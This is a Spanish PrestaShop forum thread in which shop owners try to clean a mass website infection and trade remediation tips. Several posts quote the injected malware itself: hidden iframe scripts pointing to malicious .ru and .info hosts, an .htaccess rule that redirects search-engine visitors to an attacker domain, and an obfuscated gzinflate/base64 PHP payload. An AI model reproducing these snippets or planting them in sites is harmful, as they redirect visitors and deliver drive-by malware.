Jump to content

Ataques a nuestras web por favor ayuda de profesionales prestashop


jajajaja@
 Share

Recommended Posts

<p>Hola estoy perdido me conmentan esto de mi hosting tengo que eliminar todo lo que pongo

 

Después de cerrar el body en el html tu web tiene un código que Google detecta como malicioso:

 

<script type="text/javascript">/* <![CDATA[ */

document.write('<iframe align="center" frameborder="no" height="2" name="Twitter" scrolling="auto" src="

Edited by elitemfitness (see edit history)

Share this post


Link to post
Share on other sites

Para comenzar, deberías indicarnos qué versión de Prestashop tienes instalada.

 

Supongo que tu problema por lo que describes no tiene nada que ver con este otro, ¿verdad?:

http://www.prestashop.com/forums/topic/125972-virus-en-prestashop/

 

Observando el código que nos has indicado como malicioso, parece que tiene que ver con algún módulo de Twitter. ¿Has comprobado si desactivando ese módulo (simplemente para hacer una comprobación), Google deja de incluir tu tienda de su lista negra?

 

Un saludo.

Share this post


Link to post
Share on other sites

Para comenzar, deberías indicarnos qué versión de Prestashop tienes instalada.

 

Supongo que tu problema por lo que describes no tiene nada que ver con este otro, ¿verdad?:

http://www.prestasho...-en-prestashop/

 

Observando el código que nos has indicado como malicioso, parece que tiene que ver con algún módulo de Twitter. ¿Has comprobado si desactivando ese módulo (simplemente para hacer una comprobación), Google deja de incluir tu tienda de su lista negra?

 

Un saludo.

<p>hola gracias por tu ayuda tengo la ultima version de prestashop creo entender que hay algun modulo de twitter que introduce este codigo en theme y lo coloca en debug.tpl lo he eliminado barias vezes y nada sigue hay

 

<p><p>hola gracias por tu ayuda tengo la ultima version de prestashop creo entender que hay algun modulo de twitter que introduce este codigo en theme y lo coloca en debug.tpl lo he eliminado barias vezes y nada sigue hay

Share this post


Link to post
Share on other sites

Fichero header.tpl y footer.tpl de tu plantilla, busca esto:

 

<!--c3284d-->																																																		<script type="text/javascript">
document.write('<iframe src="http://
</script><!--/c3284d-->

 

Y cargatelo.

 

No se te olvide forzar compilación, después de realizar el cambio.

 

PD: En realidad, búscalo en todos los ficheros.

  • Like 1

Share this post


Link to post
Share on other sites

Fichero header.tpl y footer.tpl de tu plantilla, busca esto:

 

<!--c3284d-->																																																		<script type="text/javascript">
document.write('<iframe src="http://
</script><!--/c3284d-->

 

Y cargatelo.

 

No se te olvide forzar compilación, después de realizar el cambio.

 

elimino el codogo entero que me pones?

4estoy desesperado con esto pierdo muchos clientes gracias

 

 

google me comento esto

 

Software malintencionado

 

Google ha detectado código dañino en tu sitio. Aunque aún no se ha llegado a un estado crítico, te recomendamos que soluciones esta incidencia lo antes posible. De lo contrario, es posible que los usuarios de Google vean una página de advertencia al intentar visitar páginas de este sitio

A continuación, se muestran algunas de las páginas infectadas, pero no es suficiente eliminar estas páginas para limpiar tu sitio. Debes identificar y solucionar las vulnerabilidades subyacentes. Cómo limpiar tu sitio

Incidencia general

Algunas URL de este sitio redirigen a los navegadores a páginas que instalan software malintencionado, lo que indica que los servidores que alojan las páginas de este sitio pueden contener archivos de configuración modificados (como, por ejemplo, el archivo .htaccess de Apache).

Share this post


Link to post
Share on other sites

si esta como elimino y que elimino de todo esto muchas gracias

 

 

 

#c3284d#

<IfModule mod_rewrite.c>

RewriteEngine On

RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)

RewriteRule ^(.*)$ http://torvaldscallthat.info/in.cgi?16 [R=301,L]

</IfModule>

#/c3284d#

# .htaccess automaticaly generated by PrestaShop e-commerce open-source solution

# WARNING: PLEASE DO NOT MODIFY THIS FILE MANUALLY. IF NECESSARY, ADD YOUR SPECIFIC CONFIGURATION WITH THE HTACCESS GENERATOR IN BACK OFFICE

# http://www.prestashop.com - http://www.prestashop.com/forums

 

 

<IfModule mod_rewrite.c>

# URL rewriting module activation

RewriteEngine on

 

# URL rewriting rules

RewriteRule ^([a-z0-9]+)\-([a-z0-9]+)(\-[_a-zA-Z0-9-]*)/[_a-zA-Z0-9-]*\.jpg$ /img/p/$1-$2$3.jpg [L]

RewriteRule ^([0-9]+)\-([0-9]+)/[_a-zA-Z0-9-]*\.jpg$ /img/p/$1-$2.jpg [L]

RewriteRule ^([0-9])(\-[_a-zA-Z0-9-]*)?/[_a-zA-Z0-9-]*\.jpg$ /img/p/$1/$1$2.jpg [L]

RewriteRule ^([0-9])([0-9])(\-[_a-zA-Z0-9-]*)?/[_a-zA-Z0-9-]*\.jpg$ /img/p/$1/$2/$1$2$3.jpg [L]

RewriteRule ^([0-9])([0-9])([0-9])(\-[_a-zA-Z0-9-]*)?/[_a-zA-Z0-9-]*\.jpg$ /img/p/$1/$2/$3/$1$2$3$4.jpg [L]

RewriteRule ^([0-9])([0-9])([0-9])([0-9])(\-[_a-zA-Z0-9-]*)?/[_a-zA-Z0-9-]*\.jpg$ /img/p/$1/$2/$3/$4/$1$2$3$4$5.jpg [L]

RewriteRule ^([0-9])([0-9])([0-9])([0-9])([0-9])(\-[_a-zA-Z0-9-]*)?/[_a-zA-Z0-9-]*\.jpg$ /img/p/$1/$2/$3/$4/$5/$1$2$3$4$5$6.jpg [L]

RewriteRule ^([0-9])([0-9])([0-9])([0-9])([0-9])([0-9])(\-[_a-zA-Z0-9-]*)?/[_a-zA-Z0-9-]*\.jpg$ /img/p/$1/$2/$3/$4/$5/$6/$1$2$3$4$5$6$7.jpg [L]

RewriteRule ^([0-9])([0-9])([0-9])([0-9])([0-9])([0-9])([0-9])(\-[_a-zA-Z0-9-]*)?/[_a-zA-Z0-9-]*\.jpg$ /img/p/$1/$2/$3/$4/$5/$6/$7/$1$2$3$4$5$6$7$8.jpg [L]

RewriteRule ^([0-9])([0-9])([0-9])([0-9])([0-9])([0-9])([0-9])([0-9])(\-[_a-zA-Z0-9-]*)?/[_a-zA-Z0-9-]*\.jpg$ /img/p/$1/$2/$3/$4/$5/$6/$7/$8/$1$2$3$4$5$6$7$8$9.jpg [L]

RewriteRule ^c/([0-9]+)(\-[_a-zA-Z0-9-]*)/[_a-zA-Z0-9-]*\.jpg$ /img/c/$1$2.jpg [L]

RewriteRule ^c/([a-zA-Z-]+)/[a-zA-Z0-9-]+\.jpg$ /img/c/$1.jpg [L]

RewriteRule ^([0-9]+)(\-[_a-zA-Z0-9-]*)/[_a-zA-Z0-9-]*\.jpg$ /img/c/$1$2.jpg [L]

RewriteRule ^([0-9]+)\-[a-zA-Z0-9-]*\.html /product.php?id_product=$1 [QSA,L]

RewriteRule ^[a-zA-Z0-9-]*/([0-9]+)\-[a-zA-Z0-9-]*\.html /product.php?id_product=$1 [QSA,L]

RewriteRule ^([0-9]+)\-[a-zA-Z0-9-]*(/[a-zA-Z0-9-]*)+ /category.php?id_category=$1&noredirect=1 [QSA,L]

RewriteRule ^([0-9]+)\-[a-zA-Z0-9-]* /category.php?id_category=$1 [QSA,L]

RewriteRule ^([0-9]+)__([a-zA-Z0-9-]*) /supplier.php?id_supplier=$1 [QSA,L]

RewriteRule ^([0-9]+)_([a-zA-Z0-9-]*) /manufacturer.php?id_manufacturer=$1 [QSA,L]

RewriteRule ^content/([0-9]+)\-([a-zA-Z0-9-]*) /cms.php?id_cms=$1 [QSA,L]

RewriteRule ^content/category/([0-9]+)\-([a-zA-Z0-9-]*) /cms.php?id_cms_category=$1 [QSA,L]

RewriteRule ^pagina-no-encuentra$ /404.php [QSA,L]

RewriteRule ^direccion$ /address.php [QSA,L]

RewriteRule ^direcciones$ /addresses.php [QSA,L]

RewriteRule ^autenticacion$ /authentication.php [QSA,L]

RewriteRule ^mas-vendidos$ /best-sales.php [QSA,L]

RewriteRule ^carro-de-la-compra$ /cart.php [QSA,L]

RewriteRule ^contactenos$ /contact-form.php [QSA,L]

RewriteRule ^descuento$ /discount.php [QSA,L]

RewriteRule ^estado-pedido$ /guest-tracking.php [QSA,L]

RewriteRule ^historial-de-pedidos$ /history.php [QSA,L]

RewriteRule ^identidad$ /identity.php [QSA,L]

RewriteRule ^fabricantes$ /manufacturer.php [QSA,L]

RewriteRule ^mi-cuenta$ /my-account.php [QSA,L]

RewriteRule ^nuevos-productos$ /new-products.php [QSA,L]

RewriteRule ^carrito$ /order.php [QSA,L]

RewriteRule ^devolucion-de-productos$ /order-follow.php [QSA,L]

RewriteRule ^pedido-rapido$ /order-opc.php [QSA,L]

RewriteRule ^vales$ /order-slip.php [QSA,L]

RewriteRule ^contrasena-olvidado$ /password.php [QSA,L]

RewriteRule ^promocion$ /prices-drop.php [QSA,L]

RewriteRule ^buscar$ /search.php [QSA,L]

RewriteRule ^mapa-del-sitio$ /sitemap.php [QSA,L]

RewriteRule ^tiendas$ /stores.php [QSA,L]

RewriteRule ^proveedores$ /supplier.php [QSA,L]

</IfModule>

 

# Catch 404 errors

ErrorDocument 404 /404.php

 

<IfModule mod_expires.c>

ExpiresActive On

ExpiresByType image/gif "access plus 1 month"

ExpiresByType image/jpeg "access plus 1 month"

ExpiresByType image/png "access plus 1 month"

ExpiresByType text/css "access plus 1 week"

ExpiresByType text/javascript "access plus 1 week"

ExpiresByType application/javascript "access plus 1 week"

ExpiresByType application/x-javascript "access plus 1 week"

ExpiresByType image/x-icon "access plus 1 year"

</IfModule>

 

FileETag INode MTime Size

<IfModule mod_deflate.c>

AddOutputFilterByType DEFLATE text/html

AddOutputFilterByType DEFLATE text/css

AddOutputFilterByType DEFLATE text/javascript

AddOutputFilterByType DEFLATE application/javascript

AddOutputFilterByType DEFLATE application/x-javascript

</IfModule>

Share this post


Link to post
Share on other sites

Vuelve a generar el archico .htaccess desde Herramientas / Generadores . Tienes un redireccionamiento a torvaldscallthat.info.

Asegurate de no tener ninguna referencia a ese enlace o a cualquier otro en el campo de Configuración especifica al generar el .htaccess

Edited by wurrumin (see edit history)

Share this post


Link to post
Share on other sites

Una cosa más, estos días hemos detectado por clientes que han sido atacados que una vulnerabilidad en Plesk (http://www.parallels.com/es/products/plesk/) permite meter inyecciones javascript de malware en Prestashop. Los ficheros afectados son js de módulos y del theme. Lo digo por si os pasa. Es tan fácil como borrar el js malicioso, que los sysadmin instalen el parche en el plesk y ala. Pero yo huiría de Plesk, siempre :)

Share this post


Link to post
Share on other sites

Hola, estoy teniendo un problema similar con la inyección de código entre esas etiquetas <!--/c3284d-->. En principio he limpiado todo el sitio localizando el código con WindowsGrep, pero sigue saliendo el código. Mi Prestashop afectado es la versión 1.3.7.

 

¿como puedo forzar la compilación desde esta versión ya que no aparece esa opción en el backend?

Share this post


Link to post
Share on other sites

Desde el config/smarty.config.inc.php

 

$smarty->force_compile    = false; // to pass "false" when put into production

 

Pásalo a

 

$smarty->force_compile    = true; // to pass "false" when put into production

Share this post


Link to post
Share on other sites

Gracias por la rapidez. No he encontrado esas líneas en mi versión de PS.

 

En cualquier caso, me faltaba localizar también la cadena #c3284d#

 

En principio parece que ya no inyecta ningún código, sólo me falta revisar un par de tiendas más afectadas por lo mismo y pedir revisión a Mr Google...

 

Saludos.

Share this post


Link to post
Share on other sites

Puedes pegar el contenido del fichero smarty config?

 

 

<?php

 

require_once(_PS_SMARTY_DIR_.'Smarty.class.php');

$smarty = new Smarty();

$smarty->template_dir = _PS_THEME_DIR_.'tpl';

$smarty->compile_dir = _PS_SMARTY_DIR_.'compile';

$smarty->cache_dir = _PS_SMARTY_DIR_.'cache';

$smarty->config_dir = _PS_SMARTY_DIR_.'configs';

$smarty->caching = false;

$smarty->force_compile = true; // to pass "false" when put into production

$smarty->compile_check = false;

//$smarty->debugging = true;

$smarty->debug_tpl = _PS_ALL_THEMES_DIR_ . 'debug.tpl';

 

function smartyTranslate($params, &$smarty)

{

/*

* Warning : 2 lines have been added to the Smarty class.

* "public $currentTemplate = null;" into the class itself

* "$this->currentTemplate = Tools::substr(basename($resource_name), 0, -4);" into the "display" method

*/

global $_LANG, $_MODULES, $cookie, $_MODULE;

if (!isset($params['js'])) $params['js'] = 0;

if (!isset($params['mod'])) $params['mod'] = false;

$msg = false;

 

$string = str_replace('\'', '\\\'', $params['s']);

$key = $smarty->currentTemplate.'_'.md5($string);

if ($params['mod'])

{

$iso = Language::getIsoById($cookie->id_lang);

 

if (Tools::file_exists_cache(_PS_THEME_DIR_.'modules/'.$params['mod'].'/'.$iso.'.php'))

{

$translationsFile = _PS_THEME_DIR_.'modules/'.$params['mod'].'/'.$iso.'.php';

$modKey = '<{'.$params['mod'].'}'._THEME_NAME_.'>'.$key;

}

else

{

$translationsFile = _PS_MODULE_DIR_.$params['mod'].'/'.$iso.'.php';

$modKey = '<{'.$params['mod'].'}prestashop>'.$key;

}

 

if (@include_once($translationsFile))

$_MODULES = array_merge($_MODULES, $_MODULE);

 

$msg = (is_array($_MODULES) AND key_exists($modKey, $_MODULES)) ? ($params['js'] ? addslashes($_MODULES[$modKey]) : stripslashes($_MODULES[$modKey])) : false;

}

if (!$msg)

$msg = (is_array($_LANG) AND key_exists($key, $_LANG)) ? ($params['js'] ? addslashes($_LANG[$key]) : stripslashes($_LANG[$key])) : $params['s'];

return ($params['js'] ? $msg : Tools::htmlentitiesUTF8($msg));

}

$smarty->register_function('l', 'smartyTranslate');

 

function smartyDieObject($params, &$smarty)

{

return Tools::D($params['var']);

}

$smarty->register_function('d', 'smartyDieObject');

 

function smartyShowObject($params, &$smarty)

{

return Tools::P($params['var']);

}

$smarty->register_function('p', 'smartyShowObject');

 

function smartyMaxWords($params, &$smarty)

{

$params['s'] = str_replace('...', ' ...', html_entity_decode($params['s'], ENT_QUOTES, 'UTF-8'));

$words = explode(' ', $params['s']);

 

foreach($words AS &$word)

if(Tools::strlen($word) > $params['n'])

$word = Tools::substr(trim(chunk_split($word, $params['n']-1, '- ')), 0, -1);

 

return implode(' ', Tools::htmlentitiesUTF8($words));

}

 

$smarty->register_function('m', 'smartyMaxWords');

 

function smartyTruncate($params, &$smarty)

{

$text = isset($params['strip']) ? strip_tags($params['text']) : $params['text'];

$length = $params['length'];

$sep = isset($params['sep']) ? $params['sep'] : '...';

 

if (Tools::strlen($text) > $length + Tools::strlen($sep))

$text = Tools::substr($text, 0, $length).$sep;

 

return (isset($params['encode']) ? Tools::htmlentitiesUTF8($text, ENT_NOQUOTES) : $text);

}

 

$smarty->register_function('t', 'smartyTruncate');

 

function smarty_modifier_truncate($string, $length = 80, $etc = '...',

$break_words = false, $middle = false, $charset = 'UTF-8')

{

if ($length == 0)

return '';

 

if (Tools::strlen($string) > $length) {

$length -= min($length, Tools::strlen($etc));

if (!$break_words && !$middle) {

$string = preg_replace('/\s+?(\S+)?$/u', '', Tools::substr($string, 0, $length+1, $charset));

}

if(!$middle) {

return Tools::substr($string, 0, $length, $charset) . $etc;

} else {

return Tools::substr($string, 0, $length/2, $charset) . $etc . Tools::substr($string, -$length/2, $charset);

}

} else {

return $string;

}

}

 

$smarty->register_modifier('truncate', 'smarty_modifier_truncate');

$smarty->register_modifier('secureReferrer', array('Tools', 'secureReferrer'));

 

global $link;

 

$link = new Link();

$smarty->assign('link', $link);

 

?>

Share this post


Link to post
Share on other sites

es este: $smarty->force_compile = true; // to pass "false" when put into production

 

Para recompilar

 

$smarty->force_compile = true; // to pass "false" when put into production

 

Para optimizar

 

$smarty->force_compile = false; // to pass "false" when put into production

  • Like 1

Share this post


Link to post
Share on other sites

Buenas tardes, antes de nada quiero dar las gracias tanto al moderador de este hilo como a todos aquellos que dedicáis un poco de vuestro valioso tiempo a ayudar a gente como yo que no tiene mucha idea de este tema, pero que tiene muchas ganas de aprender y poder ayudar a otros, dicho esto os cuento mi experiencia con este hilo.

 

ayer sufrí el mismo ataque que los compañeros que han posteado, he seguido los pasos que amablemente habeis indicado y he procedido a buscar el código maligno que he encontrado en los Ficheros header.tpl y footer.tpl del tema que tengo puesto y ojo en la plantilla que trae por defecto prestashop he generado el fichero htaccess,

las cuestiones que os planteo son las siguientes:

a) el resto de compañeros que os a pasado este problema habeis encontrado algún rastro de este código en otros ficheros que no sean estos últimos que he indicado, si a sido a si, cuales son, olvide decir la versión del presta la 1.4.6.2

 

b)después de realizar las indicaciones que amablemente nos ofrecéis, en la mayoría de los buscadores no hay problema pero en chrome cuando entras a la web sale una pagina avisando de que tenemos este problema, ya pedí la revisión a google , sabéis cuanto tarda?

 

c) algo importante para mi, sabéis como diablos a podido entrar eso al ftp ando loco con la incertidumbre de saber si se puede volver a repetir puesto que además de esta tienda tarimasdeducha.es, tenemos otras dos mas que afortunadamente no han sido atacadas.

 

un saludo y gracias otra vez

Share this post


Link to post
Share on other sites

Hola tutmosis. Te sugiero que pongas la url de tu site aquí: sitecheck.sucuri.net/scanner/ y busques en todo el site la cadena de código que te indiquen. Normalmente estos ataques se focalizan en archivos js y tpl. Recuerda recompilar las plantillas activando la compilación en la back si tienes pshop 1.4 o superior.

 

Suerte!

Share this post


Link to post
Share on other sites

Hola y gracias a todos por la ayuda sin bosotros los navatillos estariamos perdidos.

 

yo tengo el mismo problema en 5 tiendas

hace unos dias detecte esto en mis tiendas un compañero de este foro me ayudo a elimenar todo esto y atencion los encontre en

 

theme/debug.tpl y dentro de la carpeta theme en footer.tpl y headre.tpl lo elimine de mis 5 tiendas y despues de unos 4 dias an buelto a salir alguna solucion por que estoy muy preocupado

 

conoceis este modulo gratuito

http://addons.prestashop.com/es/administration/1417-protect-your-templates--protegez-vos-themes.html&adforum

 

 

<!--c3284d--> <script type="text/javascript">

document.write('<iframe src="http://24-procent.ru/in.cgi?16" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');

</script><!--/c3284d-->

 

gracias

Edited by elitemfitness (see edit history)

Share this post


Link to post
Share on other sites

pues nada yo llevo dos días con esta leche le he quitado casi 165 ficheros con el código, y ya no me detecta el código al pasarle el avas estoy negro, mi web esta en ovh y las tullas elitemfitness,

 

cuando descubráis lo que sea pasarlo por aquí

 

muchas gracias jordiob he seguido tus instrucciones y la primera vez que la pase por este sitio me dio 165 problemas después de limpiarla con mis limitados conocimientos me dice que solo esta, que te parece.

 

 

error.pngBlacklisted: Yes check.pngMalware: No check.pngMalicious javascript: No check.pngMalicious iFrames: No check.pngDrive-By Downloads: No check.pngAnomaly detection: No check.pngIE-only attacks: No check.pngSuspicious redirections: No check.pngSpam: No

 

 

 

muchas gracias.

Share this post


Link to post
Share on other sites

estaria bien que digeras en que carpetas tienes ese codigo para conparar las mias

yo e formateado mo pc el avast perfecto spybot perfecto etc..

no se que cñ es esto mero estoy negro mis clientes entra en mi web y les redirige a otras

necesitamos ayuda lo mas urgente posible de prestashop

gracias

Share this post


Link to post
Share on other sites

Hola.

 

Yo antes de ponerme a borrar código malicioso emplearía mi tiempo en saber cómo han entrado y cómo poner remedio.

 

Después me pondría a borrar código malicioso y a hacer un análisis del sistema para detectar otras posibles sorpresas que nos hayan dejado y que no esté tan a la vista como un js.

 

un saludo

Share this post


Link to post
Share on other sites

Hola yo tenia la carpeta mails bastante mal y algunos mas en algunos módulos de mi tema cool - putih

y en el theme prestashop también tenia bicho el avas me dio 165 incidencias del código este,

 

yo lo que he hecho es vajarme la carpeta www de mi ftp entera y pasar el avas en la opción de analizar carpetas y parece ser que ahora y después de limpiarla solo me dicen que estoy en la lista negra de google, ya pedí revision a ver que pasa.

 

MUY importante lo que dice oka todavía no sabemos como y por donde a entrado este :ph34r:

Share this post


Link to post
Share on other sites

Avisad a los administradores de vuestro servidor y que pongan parches de seguridad, es lo mejor para prevenir estos ataques. No es un tema de tener la última versión de Prestashop, pues los 1.4.8.2 también están siendo atacados.

Share this post


Link to post
Share on other sites

muchas gracias jordiob he seguido tus instrucciones y la primera vez que la pase por este sitio me dio 165 problemas después de limpiarla con mis limitados conocimientos me dice que solo esta, que te parece.

 

De nada! para eso estamos.

 

El proceso para detectar/limpiar el site que yo uso es el siguiente

 

1- Entrar en http://sitecheck.sucuri.net/scanner/ y analizar el site

2- Copiar la cadena de búsqueda que encuentre sucuri de código malicioso

3- Bajarse todo el contenido del site en local

4- Usando Dreamweaver o Eclipse, haced un site/proyecto nuevo y haced una búsqueda global en el site buscando la cadena de código malicioso.

5- Borrar ese código y resubir los archivos al servidor

6- Activar compilación smarty y entrar en todas las páginas de TPLs afectadas

7- Pasar de nuevo el site por sucuri. En paralelo avisar a los admins del servidor, informarles del ataque y que pongan los parches de seguridad necesarios. Normalmente las vulnerabilidades son del panel de control.

 

Recordad que esto no es un virus que tengáis en local, que afecte a las plantillas y que las suba al servidor. Este es un malware que ataca al servidor donde tenéis el site y añade el código malicioso.

 

Suerte! :)

Share this post


Link to post
Share on other sites

Hola.

 

No sé qué ataque estáis recibiendo, creo que un compañero puso más arriba que había unos avisos de seguridad con Cpanel.

 

De todo el software que uséis en las tiendas tenéis que estar apuntados a sus listas y avisos de seguridad, no vale tener el prestashop actualizado a la última versión y tener un phpmyadmin vulnerable abierto a todo el mundo.

 

Al ser un ataque claramente automatizado estáis de suerte, será un bug en algún software que uséis y que sea bastante conocido, el fabricante del software afectado seguramente haya sacado ya un parche que lo solucione.

 

Después de resolverlo miraría poner mod_security como firewall en Apache y un aide para monitorizar con firma md5 todos los archivos de prestashop.

 

Un saludo.

Share this post


Link to post
Share on other sites

pues nada no hay manera de eliminarlo por completo lo limpio de todo elimino todo y a las horas esta hay otra vez

si esto no lo soluciona alguien directo de prestashop no se como se solucionara

gracias

Share this post


Link to post
Share on other sites

pues nada no hay manera de eliminarlo por completo lo limpio de todo elimino todo y a las horas esta hay otra vez

si esto no lo soluciona alguien directo de prestashop no se como se solucionara

gracias

 

Hola, el problema seguramente esté en otro software que no tiene nada que ver con prestashop (aunque no pongo la mano en el fuego después de leer cosas como ésta: http://webcoder.biz/blog/prestashop-cross-site-scriptingxss-vulnerability/ )

 

Ya lo comenté antes, borrar el código malicioso es inútil si antes no has solucionado el bug que ha permitido la entrada del "bicho".

 

El bug puede estar en un phpmyadmin, un cpanel un plesk bufff a saber, sólo tú sabes qué software usas en tu plataforma.

 

Si estás en un hosting administrado deberás pedir soporte a ellos y pedirles que actualicen sus sistemas a los últimos parches de seguridad.

 

Aún así el "bicho" bien podría haber dejado una puerta trasera en la máquina y todo lo que he comentado antes no valdría para nada, toca también hacer una revisión de la máquina.

 

un saludo.

Share this post


Link to post
Share on other sites

e formateado mi pc e eliminado todo los bichos e pasado antivirus y malwarw etc.. lo e comentado con mi hosting y lo unico que me dicen que lo elimine todo tengo 5 tiendas afectadas por esto si esto no lo cojen directos de prestashop no se como cñ se va a solucionar gracias

Edited by elitemfitness (see edit history)

Share this post


Link to post
Share on other sites

Estoy con el mismo problema... :( Siguiendo el post borre el codigo que me marcaba la herramienta de webmaster de google, todo bien pero ahora veo que me va marcando URL nuevas afectadas y vuelvo a mirar el header.tpl. y footer.tpl y vuelve a estar hay el codigo, el codigo que me indica es este:

 

<script type="text/javascript">

document.write('<iframe src="http://archivingmini.info/in.cg

i?16" name="Twitter" scrolling="auto" frameborder="no" align

="center" height="2" width="2"></iframe>');

</script>

 

Pensaba que era culpa del modulo pie de pagina buhoc pero veo gente con este problema no tiene ese modulo.

 

Como indica jordiob entre en la pagina: http://sitecheck.sucuri.net/scanner/

 

Y esto es lo que me dice:

 

web site: centralseeds.com

status: Site infected with malware

web trust: Not Blacklisted

warn:

 

Plesk version 10 outdated: Upgrade required.

 

Y el codigo malicioso que me reporta en todas mas o menos es este:

 

<iframe src="http://whitecada.ru/in.cgi?16" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2">

 

 

Necesito ayuda!!

 

No hay ningun modulo gratuito o no para impedir estas cosas?

Edited by lirelok (see edit history)

Share this post


Link to post
Share on other sites

esto es lo que me comenta mi hosting

 

Buenos días,

 

Los parches de seguridad deben aplicarse al Prestashop, no al servidor. En el servidor utilizamos mod_security que se trata de un módulo del servidor Web Apache que filtra una gran cantidad de ataques conocidos de la mayoría de aplicaciones. Pero por nuestra parte no podemos hacer más, la seguridad pasa por tener las aplicaciones instaladas y utilizar contraseñas seguras.

 

Como te indicamos no vemos incidencia a solucionar por nuestra parte.

 

Un saludo.

 

es muy importante que todos los que tengais este problema paseis en las carpetas que lo aveis encontrado para poder contrastar con los demas

un saludo

Edited by elitemfitness (see edit history)

Share this post


Link to post
Share on other sites

Bueno yo tambien lo comente al hosting esta mañana y me dicen que era un fallo que solventan con una actualizacion que a salido para prestashop, que segun dice me a puesto en ese momento, me paso el link de la actualizacion pero no lo guarde, luego se lo pregunto y te lo paso, segun ellos con eso se debe arreglar esa vulneravilidad... ojala sea asi... la compañia que tengo de hosting es loading.

 

Pero bueno ahora habra que erradicar todo el codigo que a entrado, yo estoy buscando por encima y demomento solo e visto el codigo en el header.tpl y footer.tpl, aunque tambien veo este en el index.php de mi plantilla que realmente no se si es malicioso o no, es este:

 

#c3284d#

echo(gzinflate(base64_decode("3Y5BDsIgEEX3TXoHMpvqpkQXLhTwEl4AAWFMCw2dit5eam/hrCb//3nzGfuPEbPJOBGjz+QkkHsTf+qX3lRQbWOTWUYXqS8Zye06gY+sR8fmbCQEounMeQnVMtrqPi8cY288Xg8nYLEGJdwKErkMrELTMGD0EvRCCdiPdE/ZuiwhVkEP6KMEU/+tB8GhDyThCKygpbBuSvCtger2l7YRfKuqvg==")));

#/c3284d#

Share this post


Link to post
Share on other sites

e encontrado codigo malicioso tambien en los archivos:

 

restricted-country.tpl

maintenance.tpl

debug.tpl (esta fuera de la carpeta del theme)

 

Por el momneto e revisado todos los archivos tpl de la carpeta del theme y los archivos js.

Edited by lirelok (see edit history)

Share this post


Link to post
Share on other sites

hola jordi, en herramientas de webmaster de google me indican 4 URL problematicas, en detalles te indica cual es el codigo maligno..xD pero indica donde se encuentra?

 

luego tambien veo un scrpt instalado en mi web que es un buscador de bing, solo se ve en dispositivos mobiles, aunque con el nocript lo detecto en mi ordenador, esto tambien se me a instalado por la cara, pero no consigo ver donde esta ese codigo para eliminarlo.

 

esta es mi web: http://www.centralseeds.com

Share this post


Link to post
Share on other sites

hola jordi, en herramientas de webmaster de google me indican 4 URL problematicas, en detalles te indica cual es el codigo maligno..xD pero indica donde se encuentra?

 

luego tambien veo un scrpt instalado en mi web que es un buscador de bing, solo se ve en dispositivos mobiles, aunque con el nocript lo detecto en mi ordenador, esto tambien se me a instalado por la cara, pero no consigo ver donde esta ese codigo para eliminarlo.

 

esta es mi web: http://www.centralseeds.com

 

Aquí tienes las páginas infectadas: http://sitecheck.sucuri.net/results/www.centralseeds.com/ que son shopping-cart.tpl y cms.tpl y las de order-XXX.tpl

Share this post


Link to post
Share on other sites

donde ves que son esos archivos? e descargado del ftp y revisado los archivos y no veo el codigo malicioso, lo que busco supongo que sera como lo que e ido borrando , algo como esto:

 

<iframe src="http://whitecada.ru/in.cgi?16" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2">

 

Si es asi, no lo veo.

Share this post


Link to post
Share on other sites

oki entonces esque la pagina esa que hace el scan tarda en ver la modificaciones, porque ya no hay nada en esos archivos, aunque cuando miro con el firebug el script de la pagina web sigue saliendo codigo malicioso.... no se donde debe estar, esto me tiene loco.....

Share this post


Link to post
Share on other sites

oki pero me da que todavia faltan cosas, porque me sale mirandolo con el mobil un buscador de bing que se a metido hay por la cara y que no consigo sacar, algun programa parecido al firebug para el mobil? xD esque es el unico sitio donde puedo ver de donde sale eso, o de alguna manera el noscript me puede dar el script de esa funcion? lo unico que veo que puedo hacer con el es permitir bing.com o no permitir.

Share this post


Link to post
Share on other sites

Mas tarde colgare las carpetas donde se introducen estos códigos yo eliminando todo y desinstalando los módulos de twitter hasta el momento después de mas de 16h no sea introducido otra vez (antes eliminabas y alas 2 o 3h estaba hay otra vez)

 

es muy importante revisar carpeta por carpeta tanto php como tpl todas todas si las eliminas por completo solucionado o eso espero

 

un saludo

 

esto contestan desde mi hosting

 

Los parches de seguridad deben aplicarse al Prestashop, no al servidor. En el servidor utilizamos mod_security que se trata de un módulo del servidor Web Apache que filtra una gran cantidad de ataques conocidos de la mayoría de aplicaciones. Pero por nuestra parte no podemos hacer más, la seguridad pasa por tener las aplicaciones instaladas y utilizar contraseñas seguras.

 

Como te indicamos no vemos incidencia a solucionar por nuestra parte.

 

Un saludo.

Edited by elitemfitness (see edit history)

Share this post


Link to post
Share on other sites

